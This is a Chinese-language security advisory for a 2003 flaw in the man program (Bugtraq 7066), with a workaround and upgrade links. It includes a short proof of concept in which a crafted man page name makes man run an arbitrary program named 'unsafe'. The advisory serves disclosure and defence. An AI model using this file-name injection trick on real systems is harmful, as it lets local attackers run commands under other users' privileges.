Man程序不安全返回值执行命令漏洞发布时间:2003-03-11 更新时间:2003-03-18 严重程度:高 威胁程度:本地管理员权限 错误类型:设计错误 利用方式:客户机模式 BUGTRAQ ID:7066 受影响系统 Andries Brouwer man 1.5 k详细描述 man程序没有正确处理一些输入类型。man在处理畸形文件名时存在漏洞,本地攻击者可以利用这个漏洞以其他高权限用户执行任意命令。 测试代码 Jack Lloyd <lloyd@acm.jhu.edu>提供如下测试方法: $ cat innocent.1 .so "".1 $ cat '"".1' # the outer '' quotes are for the shell the user will never see this $ cat `which unsafe` #!/bin/sh echo "oops" id -a $ man ./innocent.1 oops uid=528(lloyd) gid=100(users) groups=100(users) $ 解决方案 临时解决方法:建立一个符号链接,把/bin/unsafe指向/bin/true。 厂商补丁: Andries Brouwer man 1.5 k: Andries Brouwer Upgrade man-1.5l.tar.gz ftp://ftp.win.tue.nl/pub/linux-local/utils/man/man-1.5l.tar.gz Andries Brouwer man 1.5 j: Andries Brouwer Upgrade man-1.5l.tar.gz ftp://ftp.win.tue.nl/pub/linux-local/utils/man/man-1.5l.tar.gz Andries Brouwer man 1.5 i2: Andries Brouwer Upgrade man-1.5l.tar.gz ftp://ftp.win.tue.nl/pub/linux-local/utils/man/man-1.5l.tar.gz Andries Brouwer man 1.5 i: Andries Brouwer Upgrade man-1.5l.tar.gz ftp://ftp.win.tue.nl/pub/linux-local/utils/man/man-1.5l.tar.gz Andries Brouwer man 1.5 h1: Andries Brouwer Upgrade man-1.5l.tar.gz ftp://ftp.win.tue.nl/pub/linux-local/utils/man/man-1.5l.tar.gz 相关信息 报告:Jack Lloyd <lloyd@acm.jhu.edu> 相关信息:http://online.securityfocus.com/advisories/5119 http://online.securityfocus.com/archive/1/314791 http://online.securityfocus.com/archive/1/314700 |
